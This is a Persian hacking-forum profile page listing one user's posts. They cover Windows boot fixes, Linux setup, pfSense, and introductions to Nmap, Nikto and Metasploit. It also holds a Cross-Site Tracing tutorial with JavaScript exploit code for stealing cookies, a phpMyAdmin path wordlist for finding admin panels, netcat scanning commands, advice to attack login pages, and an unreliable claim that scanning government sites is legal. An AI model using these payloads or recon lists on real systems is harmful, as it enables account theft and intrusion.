رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

Mr.Nashena3

کاربر رسمی
  • ارسال ها

    75
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    14

تمامی موارد ارسال شده توسط Mr.Nashena3

  1. با سلام از آنجایی که در انجمن چندیدن نفر این مشکل رو داشتن یک ویدیو برای حل این مشکل قرار میدم امید وارم مفید باشه کامنت های مورد نیاز bootrec /fixmbr bootrec /fixboot bootrec /ScanOs bootrec /rebuildbcd T bcdedit /export C:\BCD_Backup c: cd boot attrib bcd -s -h -r ren c:\boot\bcd bcd.old bootrec /RebuildBcd How To Fix Windows 10 Error Code 0xc00000f.mp4
  2. Mr.Nashena3

    pacman

    با سلام دوست من با دستور زیر دیتابیس رو رفرش کنید احتمالا حل میشه sudo pacman-mirrors -g sudo pacman-mirrors -g اگر حل نشد میتونید لیست کشور ها را بار دیگه راه اندازی کنید wget [Hidden Content]$(uname -m)/pacman-mirrorlist-20170319-1-any.pkg.tar.xz{,.sig} ## if there is no wget installed, use curl curl --remote-name [Hidden Content]$(uname -m)/pacman-mirrorlist-20170319-1-any.pkg.tar.xz --remote-name [Hidden Content]$(uname -m)/pacman-mirrorlist-20170319-1-any.pkg.tar.xz.sig sudo pacman -U pacman-mirrorlist-20170319-1-any.pkg.tar.xz sudo pacman-mirrors --geoip -g sudo pacman -Syyu
  3. با سلام دوست من میتونید خصوصی پیام بدید کمکتون میکنم
  4. با سلام دوست من مدل لبتاب و یه عکس از ارور قرار بدید
  5. Mr.Nashena3

    دیکد کردن php

    شما میتونید برای دکد از این اسکریپت استفاده کنید من اسکن کردم مشکل نداشت تا جایی که میدونم کار میکنه ولی باز خودتون اسکن کنید چون من ویندوز ندارم تست کنم چون فال سنگین بود نشد اتچ کنم این لینک دانلود [Hidden Content] اینم اسکن [Hidden Content] [Hidden Content]
  6. Mr.Nashena3

    دیکد کردن php

    با سلام دوست من فکر میکنم ioncube کد شده که دکد پی اچ پی ۷ پولی باشه ولی تلاشم رو میکنم
  7. آموزش کامل ‌فایروال ‌Pfsense با سلام از اونجایی که وقت تایپ زیاد ندارم این که این فایر وال چی هست و .. رو ارجاع میدم به منابع دیگه و میریم سراغ آموزش چند نکته که باید بگم ۱. این فایر وال نیاز به یک سخت افزار قوی نداره پس برای استفاده در خانه هم مفید هست ۲. آموزش رایگان این فایروال رو من در سایت های ایرانی ندیدم ۳. شرکت های بزرگی مثل اپل از این فایروال استفاده میکنند ۴. در این تایپیک اسپم ممنوع و سوالات خود را در تایپیک جدا مطرح کنید ۵. از صبر شما مچکرم ۶. برای تشکر از دکمه تشکر اسفاده کنید ----------------------------------------------------------------------------------------------------------------------------------------------------------------- Pfsense چیست؟ Pfsense یک فایروال نرم افزاری opensource می باشد که بر پایه FreeBSD ساخته شده. میتوانید از آن به عنوان یک فایروال/ روتر استفاده نمایید و روتر اختصاصی شبکه خود را داشته باشید. در رابطه با تاریخچه ایجاد pfsense، پروژه pfsense در سال 2004 آغاز شد و اولین انتشار آن در سال 2006 بود. ویژگی های pfsense :می توانید برای فیلتر کردن IP های مبدا و مقصد بسته ها و همچنین پورت های udp و tcp از آن استفاده کنید محدود کردن تعداد connection ها بر اساس rule ها مختلف ابزار های رمز نگاری پیشرفته برای سیستم عامل و شبکه مسدود سازی و اعمال محدودیت برای سرور ها و سیستم ها بر اساس نوع سیستم عامل (برای مثال اگر بخواهید سرور های لینوکسی به اینترنت دسترسی داشته باشند و سرور های ویندوزی دسترسی به اینترنت نداشته باشد بر اساس نوع سیستم عامل می توانید برای آنها اعلام وضعیت کنید ) می توانید ترافیک ها را بر اساس نوع آنها مدیریت نمایید و برای آن ها محدودیت قاعل شوید قابلیت نرمالسازی ترافیک را دارید می توانید قابلیت فیلترینگ را به صورت کامل خاموش نمایید تا سرور شما به یک روتر ساده تبدیل شود قابلیت فیلترینگ برای لایه 2 و لایه 3 در pfsense وجود دارد می توانید حتی در لایه application نیز محدودیت هایی برای کاربران قرار دهید وجود سیستم nating برای انجام nat در pfsense قابلیت پیکربندی همزمان دو فایروال در شبکه را داراست و امکان استفاده از HA یا همان قابلیت دسترسی بالا وجود دارد. به این صورت که هر دو فایروال به صورت خودکار قابلیت تعامل با یکدیگر را دارند و در صورت از دسترس خارج شدن یکی از آنها دیگری می تواند خدمات ارائه دهد می توانید از pfsense به عنوان یک سرور مانیتورینگ برای سخت افزار و وضعیت بسته ها نیز استفاده نمایید منبع : server.ir
  8. سلام دوست من معمولا در نتکت مجموع چند سوئچ باهم استفاده می‌شه Port Scan آزمایشکنندگان نفوذ معمولا از تکنیک های اسکن پورت برای جمع آوری اطلاعات استفاده می کنند. Nmap یکی از محبوب ترین ابزار برای پیدا کردن پورت های باز است. Netcat می تواند عملکرد پورت اسکن را ارائه دهد. مزیت netcat ساده و بدون وابستگی کتابخانه است. باینری netcat تنها برای اسکن پورت کافی است و می تواند برای تمام سیستم عامل های مانند ویندوز، لینوکس، یونیکس، MacOS، BSD استفاده شود. ما از گزینه -z برای پورت اسکن مانند زیر استفاده خواهیم کرد. در این مثال ما ip آدرس 192.168.180.1 را اسکن می کنیم که می تواند نام دامنه ای مانند target.com باشد. محدوده RAngePort 1-30 مشخص شده است. $ nc -z -v 192.168.122.1 1-30 Verbose Scan حالت خاموش حالت پیش فرض است که به معنی فقط پورت های باز در کنسول چاپ شده است گزینه ای -v که اطلاعات دقیق تر را تولید می کند TCP Server یکی دیگر از ویژگی های مفید netcat به عنوان یک سرور TCP عمل می کند. Netcat می تواند به پورت مشخص شده TCP گوش دهد. اما به عنوان یک اقدام امنیتی در سیستم های لینوکس تنها کاربران دارای امتیاز می توانند پورت های بین 1-1024 را گوش دهند. در این مثال ما به پورت های TCP گوش خواهیم داد. برای دادن امتیازات مورد نیاز از دستور sudo استفاده می کنیم. sudo nc -l -p 30 Send Files Trough Netcat یکی دیگر از ویژگی های مفید netcat انتقال فایل است. این داده ها می توانند برنامه یا یک فیلم باشند. netcat -l -p 4444 > myfile.txt اکنون می توانیم فایل را از سرویس گیرنده ارسال کنیم. ما فایل thefile.txt را در سمت سرویس گیرنده با تغییر مسیر به فایل netcat مانند زیر $ nc 192.168.180.1 4444 < thefile.txt Prevent DNS Lookup با استفاده ازDNS Lookup می توانید با گزینه -n غیرفعال کنید، این باعث می شود عملیات سریع تر انجام شود. netcat -n google.com 80 همانطور که در آموزش توضیح داده شده گزینه -n نام دامنه را غیرفعال میکند.
  9. با سلام اول بد نیست بگم ک اسم کاملش هست Cross-Site-Tracing ک به XST یا CST معروف هست XST یا CST یک فرم پیچیده از اسکریپت های (XSS) است که می تواند مانع از اقدامات امنیتی که قبلا برای محافظت در برابر XSS ایجاد شده است را کنار بگذارد. این شکل جدید حمله به نفوذگر اجازه می دهد کوکی ها و سایر اطلاعات احراز هویت را با استفاده از یک اسکریپت ساده در سمت سرویس گیرنده بدست آورد. به منظور محافظت از XST، کاربران اینترنت می توانند جاوا اسکریپت یا اکتیو ایکس را در مرورگرهای خود غیرفعال کنند. آموزش آیا هدف از HTTP TRACE پشتیبانی می کند؟ - با NetCat برای دانستن بر روی دستگاه لینوکس خود بروید و NETCAT را دانلود کنید. سپس، دستور زیر را دوست دارید nc www.target.com 80 چیزی شبیه به این باید بازگردانده شود HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 31 Oct 2006 08:00:29 GMT Connection: close Allow: GET, HEAD, POST, TRACE, OPTIONS Content-Length: 0 همانطور که در خط 5 دیده می شود، TRACE پشتیبانی می شود. با Telnet فقط این دستور را وارد کنید telnet www.target.com 80 اگر در گزارش مشاهده کنید خط "TRACE:yes"، بنابراین فعال شده است. با RESTClient (افزودنی فایرفاکس). لینک دانلود: [Hidden Content] Exploitation هدف این است که برای وارد کردن یک اسکریپت XST (= request) در یک صفحه وب Target به عنوان یک روش POST. یک مثال: <script type=”text/javascript”> [b]<!--[/b] function sendTrace () { var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </script> <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”> توضیحات این اسکریپت را که شما می توانید در زیر ببینید : var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); Object ایجاد می کند xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); نوع درخواست، URL را مشخص می کند و اگر درخواست باید به صورت غیر همزمان انجام شود یا نه. روش: نوع درخواست - GET یا POST url: محل فایل در سرور async: true (ناهمزمان) یا false (همگام) xmlHttp.send(); برای انتقال اطلاعات به سرور استفاده می شود xmlDoc=xmlHttp.responseText; داده های پاسخ را به عنوان یک رشته دریافت کنید alert(xmlDoc); نمایش محتوای XML با استفاده از جاوا اسکریپت <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>یک دکمه را ایجاد می کند. برای بازگرداندن، اسکریپت هنگام کلیک بر روی آن شروع می شود. اسکریپت دیگر، که برای XST بهتر است: <script type=”text/javascript”> function xssDomainTraceRequest(){ var exampleCode = “var xmlHttp = new ActiveXObject(\”Microsoft.XMLHTTP\”)\;xmlHttp.open(\”TRACE\”,\”INSERT_YOUR_URL_HERE\”,false)\ ;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;”; var target = “INSERT_YOUR_URL_HERE”; cExampleCode = encodeURIComponent(exampleCode + ‘;top.close()’); var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’; showModalDialog(target, null, readyCode); } </script> <INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie Information Using TRACE”> توضیحات بعضی از دستورات (خب صادقانه، من توضیح نمی دم - برای اسکریپت اول ساده تر بود): توجه داشته باشید که بخشی از داده هایی که دریافت می کنید (مانند پارامتر مجوز) در BASE64 کد گذاری می شود. شما می توانید تن از رمزگشایی های BASE64 را پیدا کنید، اما من این را توصیه می کنم: [Hidden Content] شما باید یک classic JS window داشته باشید که وقتی کد اسکریپت را می بینید ظاهر می شود. در حال حاضر، تفاوت های زیادی با XSS نمی بینید.
  10. با سلام خوب دوست من شما طبق آموزش زیر عمل کنید # apt-get update # apt-get install ssh # systemctl enable ssh # service ssh start این فایل رو ادیت کنید /etc/ssh/sshd_config کد زیر را اضافه کنید FROM: #PermitRootLogin prohibit-password TO: PermitRootLogin yes و در آخر # service ssh restart اگر باز مشکل حل نشد بگید
  11. با سلام میتونید این لیست رو تست کنید. /phpMyAdmin/ /phpmyadmin/ /PMA/ /admin/ /dbadmin/ /mysql/ /myadmin/ /phpmyadmin2/ /phpMyAdmin2/ /phpMyAdmin-2/ /php-my-admin/ /phpMyAdmin-2.2.3/ /phpMyAdmin-2.2.6/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.5-rc1/ /phpMyAdmin-2.5.5-rc2/ /phpMyAdmin-2.5.5/ /phpMyAdmin-2.5.5-pl1/ /phpMyAdmin-2.5.6-rc1/ /phpMyAdmin-2.5.6-rc2/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.7/ /phpMyAdmin-2.5.7-pl1/ /phpMyAdmin-2.6.0-alpha/ /phpMyAdmin-2.6.0-alpha2/ /phpMyAdmin-2.6.0-beta1/ /phpMyAdmin-2.6.0-beta2/ /phpMyAdmin-2.6.0-rc1/ /phpMyAdmin-2.6.0-rc2/ /phpMyAdmin-2.6.0-rc3/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.0-pl1/ /phpMyAdmin-2.6.0-pl2/ /phpMyAdmin-2.6.0-pl3/ /phpMyAdmin-2.6.1-rc1/ /phpMyAdmin-2.6.1-rc2/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.1-pl1/ /phpMyAdmin-2.6.1-pl2/ /phpMyAdmin-2.6.1-pl3/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmin-2.6.2-beta1/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmin-2.6.2/ /phpMyAdmin-2.6.2-pl1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-rc1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-pl1/ /phpMyAdmin-2.6.4-rc1/ /phpMyAdmin-2.6.4-pl1/ /phpMyAdmin-2.6.4-pl2/ /phpMyAdmin-2.6.4-pl3/ /phpMyAdmin-2.6.4-pl4/ /phpMyAdmin-2.6.4/ /phpMyAdmin-2.7.0-beta1/ /phpMyAdmin-2.7.0-rc1/ /phpMyAdmin-2.7.0-pl1/ /phpMyAdmin-2.7.0-pl2/ /phpMyAdmin-2.7.0/ /phpMyAdmin-2.8.0-beta1/ /phpMyAdmin-2.8.0-rc1/ /phpMyAdmin-2.8.0-rc2/ /phpMyAdmin-2.8.0/ /phpMyAdmin-2.8.0.1/ /phpMyAdmin-2.8.0.2/ /phpMyAdmin-2.8.0.3/ /phpMyAdmin-2.8.0.4/ /phpMyAdmin-2.8.1-rc1/ /phpMyAdmin-2.8.1/ /phpMyAdmin-2.8.2/ /sqlmanager/ /mysqlmanager/ /p/m/a/ /PMA2005/ /pma2005/ /phpmanager/ /php-myadmin/ /phpmy-admin/ /webadmin/ /sqlweb/ /websql/ /webdb/ /mysqladmin/ /mysql-admin/
  12. Mr.Nashena3

    رات

    سلام دوست من سوالت معلوم نیست پرت کجا باز کنی؟
  13. Mr.Nashena3

    چی شد که هکر شدین؟

    با سلام خوب همین اول بابت غلت ها املایی عذر میخوام پای بی سوادی نزارین تاپیک جالبی بود گفتم منم بگم من که اسمم همون مستر ناشناس هست و خودم رو یک هکر نمیدونم ولی خوب هک و امنیت رو دوست دارم من هم مثل بقیه دوستان از بچگی شروع کردن با داس و ویندوز و... حال هم لینوکس زمان یاهو تیم امنیتی داشتم وبرنامه های مختلف برای یاهو مینوشتم مثل بوتر کرکر دی اکتیور آیدی میکر و امسال اینها دوستان یادشونه هنوز تو بعضی از سایت های خارجی اون برنامه ها هست بعد چندین سال کافی نت داشتم که اون زمان ای دی اس ال نبود چند خط تلفن داشتم بعد های ای دی اس ال آمد اولین بار هک ای دی اس ال در ایران آموزشش رو من ساختم اگر اشتباه نکنم یا دروغ نگم که باعث معروفیتم شد بعد از اون شروع به هک سایت ها معتبر ایرانی کردم ( بچه بودیم دیگه ) الانم بچه ایم :(( ( اینم بگم که خیلی از کارها رو نمیتونم بگم چون ما اکثر کارهامون بدون اسم و نشون انجام میشه مثل بقیه دوستان فقط بچه بازی هاشو میتونم بگم بعد هم که از ایران رفتم و چندین سال در شرکت اس آ پی SAP مشغول بودم . الانم که مهم نیست کجام و چه میکنم کوچک ترین عضو اینجا هستم و در مقابل دوستان ما شاگرد و تماشاگریم/ یا علی فعلا/
  14. با سلام خوب من هم بعد از مدت ها دارم به پست میزارم بریم سراغش . فعال کردن SELinux خیلی کوتاه میگم برای این کار اول باید بدونید که SELinux میشه به سه حالت پیکربندی کرد Disabled: Turned-off Permissive: Prints warnings Enforcing: Policy is enforced خوب ابتدا با فرمان زیر فایل کامفیگ رو ادیت میکنیم #nano /etc/selinux/config بعد از آن SELINUX را به حالت enforcing تعغییر بدید SELINUX=enforcing تصویر امید وارم مفید بوده باشه
  15. Mr.Nashena3

    دانلود فایروال کریو

    نسخه جدید ترش رو میتونید از سایت خود نرم افزار به آدرس زیر دانلود کنید. دانلود
  16. لینک آموزش رو دوستمون قرار داد شما کجاش دقیقا مشکل داری
  17. با سلام دوست من مهم نیست که در کدام بخش هست شما باید صفحه لوگین رو پیدا کنید و از آنجا حمله رو انجام بدید
  18. با سلام نه دوست من اگر فقط اسکن باشه و مشکلی برای سایت ایجاد نشه اسکن هیچ سایتی حتی سایت دولتی ایرانی جرم نیست
  19. ۲. Metasploit Penetration Testing Software پروژه متااسپلویت — پروژه اختصاص داده شده به امنیت اطلاعات است. طراحی شده برای ارائه اطلاعات در مورد آسیب‌پذیری ایجاد یک امضا برای شناسهایجاد و تست از سوء استفاده. معروف‌ترین پروژه چارچوب متاسپلویت — یک بستر مناسبی برای ایجاد و اشکال زدایی سوء استفاده است. این پروژه شامل پایه opcodes بایگانی شل کد و اطلاعات مربوط به تحقیقات امنیت کامپیوتر است. متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. ساخته شده توسط HD Moore. هنگامی که کار بر روی نسخه‌ای (۲.x) او با مت میلیر و چند داوطلب همکاری می‌کند. نسخه سوم به طور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶). در سال ۲۰۰۸ مجوز از چارچوب متاسپلویت اختصاصی به BSD تغییر کرد. در سال ۲۰۰۹ شرکت Rapid7 درگیر در مدیریت آسیب‌پذیری او اعلام کرد متاسپلویت محبوب منبع باز بسته دو منظوره برای انجام تست نفوذ. غیر تجاری نسخه هنوز هم در دسترس برای همه خواهد بود. به عنوان همتایان تجاری، با نسخه رایگان از متاسپلویت هر دو توسط مدیران سیستم و متخصصان امنیتی برای محافظت از سیستم‌های کامپیوتری و هکرها-یا کراکرهای scriptkiddies برای به دست آوردن دسترسی‌های غیرمجاز برای کنترل سیستم‌ها از راه دور استفاده می‌شود. چارچوب متاسپلویت یک ابزار برای تست نفوذ و استفاده از اکسپلویت است که اجازه می‌دهد تا شما طراحی و اکسپلویت‌های لازم در این مورد خاص از فشار نبرد که پیلود است که در صورت عدم موفقیت حمله برای مثال نصب یک پوسته یا یک VNC سرور امکان‌پذیر می‌کند. همچنین این چارچوب امکان رمز نگاری کد شل را می‌دهد که می‌تواند این حمله از شناسه یا IPSپنهان کند. برای حمله به سرور از راه دور سرویس‌ها و نسخه‌ها که نیاز تحقیقات بیشتری دارد می‌توان با کمک ابزار ان‌مپ یا nessus انجام داد. پایگاه opcodes ابزار مورد نیاز برای نوشتن اکسپلویت‌های جدید. این ابزار به شما اجازه می‌دهد که اکسپلویت که با نسخه‌های مختلف سیستم عامل طراحی و کد نویسی کنید. نرم‌افزار متااسپلویت (به انگلیسی: Metasploit) یک نرم‌افزار قوی برای نفوذ به سیستم‌های دیگر است. این نرم‌افزار امکان دسترسی به شل قربانی را به راحتی حتی بر روی ویندوز ۷ فراهم می‌کند. طرز کار این نرم‌افزار، برای شما پیوندی به برای آی‌پی‌تان با فایل نفوذ ایجاد می‌کند. کسی که روی این پیوند کلیک کند، این فایل را وارد رایانهٔ خود کرده و پس از وارد شدن این فایل به رایانهٔ فرد شما می‌توانید به راحتی دستورهای گوناگون را بر روی رایانهٔ فرد قربانی اجرا کنید. سیستم‌های میزبان این نرم‌افزار امکان نصب بر روی گنو/لینوکس، ویندوز و مک اواس را دارا می‌باشد. برای نسخهٔ لینوکس از روبی استفاده شده است. منبع : [Hidden Content] [Hidden Content] دانلود : Download
  20. با سلام دوست من شما مخازن رو آپدیت کن برای این کار از آموزش زیر استفاده کنید بعد از آن کالی رو آپدیت و آپگریت کنید برای این کار از فرمان زیر استفاده کن apt-get update && apt-get upgrade بعد از آن وین رو نصب کن اگر باز مشکلی داشتی اینجا اعلام کن با عکس تا من یا دوستان دیگه کمک کنن
  21. 1. Nmap (Network Mapper) ان‌مپ (به انگلیسی: Nmap) (برگرفته از حروف اول Network Mapper) یک پویشگر امنیتی است که در ابتدا به دست گُردُن لیون (با اسم مستعار فیودور واسکوویچ) نوشته شده و برای کشف میزبان‌ها و خدمتگزاران در یک شبکه رایانه‌ای و در نتیجه ایجاد یک «نگاشت» از شبکه، استفاده می‌شود. برای این منظور ان‌مپ بسته‌های دستکاری شده را به سمت هدف می‌فرستد و سپس پاسخ آن‌ها را تحلیل می‌کند. برخلاف بسیاری از پویشگرهای ساده پورت (port scanner) که فقط با یک نرخ ارسال ثابت که از قبل تعیین شده بسته‌ها را ارسال می‌کنند، ان‌مپ شرایط شبکه (نوسانات تأخیر، ازدحام شبکه، تداخل هدف در پویش) را نیز در نظر می‌گیرد. همچنین با در دست داشتن جامعه کاربری بزرگی که بازخورد می‌دهند و در تکامل امکانات آن شرکت می‌کنند، ان‌مپ قادر به توسعه بیش از پیش قابلیت‌های اکتشافی‌اش خارج از محدوده فقط فهم باز و بسته بودن پورت یا در دسترس بودن میزبان بوده است؛ ان‌مپ قادر است سیستم عامل هدف، نام و نسخه خدمات (services)، مدت زمان تخمینی در دسترس بودن (uptime)، نوع دستگاه و حضور فایروال را تشخیص دهد. ان‌مپ روی لینوکس، ویندوز، سولاریس، HP-UX و نسخه‌های مختلف بی اس دی (شامل مک اواس ایکس) و همچنین آمیگا اواس و SGI IRIX اجرا می‌شود. رایج‌ترین سکوی اجرای ان‌مپ، لینوکس است که ویندوز با اختلاف کمی آن را دنبال می‌کند. ویژگی‌ها از ویژگی‌های ان‌مپ می‌توان موارد زیر را نام برد: کشف میزبان - تشخیص میزبان‌ها در شبکه (بر اساس پاسخ به پینگ (Ping) یا بازبودن پورت خاص) پویش پورت‌ها تشخیص نسخه برنامه‌ها و خدمات تشخیص سیستم عامل تعامل به شکل اسکرپتی با هدف - با استفاده از موتور اسکریپت ان‌مپ (Nmap Scripting Engine)و زبان لوا، می‌توان پرس‌وجوهای سفارشی ساخت. علاوه بر موارد بالا، ان‌مپ اطلاعات بیشتری از اهداف شامل برگردان نام دی‌ان‌اس، اطلاعات قطعات، و آدرس مک را فراهم سازد. موراد استفاده از ان‌مپ: بررسی امنیت شبکه یک دستگاه با کشف اتصالات شبکه‌اس که می‌تواند به آن وصل شود. کشف پورت‌باز روی هدف قبل از تست نفوذپذیری سیستم. لیست گیری شبکه، نگاشت، نگهداری و مدیریت منابع شبکه. بررسی امنیت شبکه با کشف سرویس‌های جدید پیش‌بینی نشده. منبع : [Hidden Content] دانلود : Download
  22. با سلام در این پست میخوام ۱۰ ابزار برتر هک در سال ۲۰۱۸ رو در اینجا معرفی کنم امیدوارم که مفید باشه سوالات خود راجب هر یک از ابزار رو در یک پست جدید اعلام کنید با تشکر Mr.Nashena3
  23. ۱۰. Paros Proxy Paros ابزاری یک ابزار با ارزش برای کارشناسان امنیت نرم افزار محسوب می شو که ضمن تست کردن امنیت نرم افزارهای تحت وب ، آسیب پذیری های معمول آنها را هم شناسایی می کند. Paros می تواندی به عنوان یک Spider یا Crawler نیز عمل کند و کل محتویات یک وب سایت را کپی کند و جالب اینجاست که بعد از انجام داده این Crawl می تواند بر روی این صفحات تست های آسیب پذیری را انجام دهد و آنها را اسکن کند. دانلود : Download
  24. ۹. Nikto ابزارها و برنامه های زیادی به منظور پیداکردن آسیب پذیری های موجود در وبسایت ها وجود دارد ولی یکی از ساده ترین این ابزارها , ابزار نیکتو Nikto می باشد . هرچند که ابزار نیکتو بسیار قدیمی است ولی هنوز هم یکی از اسکنرهای محبوب به شمار می رود . این ابزار ساده و کوچک وبسایت هدف را مورد آزمون قرار می دهد و به شما گزارش آسیب پذیری های بالقوه موجود یافت شده را می دهد . آسیب پذیری هایی که با استفاده از آنها احتمال بکارگیری و هک سایت هدف وجود دارد . دانلود : Download
  25. ۸. Netsparker Netsparker Professional برای اسکن اولیه ضعف ها و نقاط امنیتی آسیب پذیر یک وب سایت، یا یک دایرکتوری مشخص و یا حتی یک وب اسکریپت که تحت سایت های AJAX/javascript کار می کند، استفاده می شود دانلود : Download
×
×
  • ایجاد مورد جدید...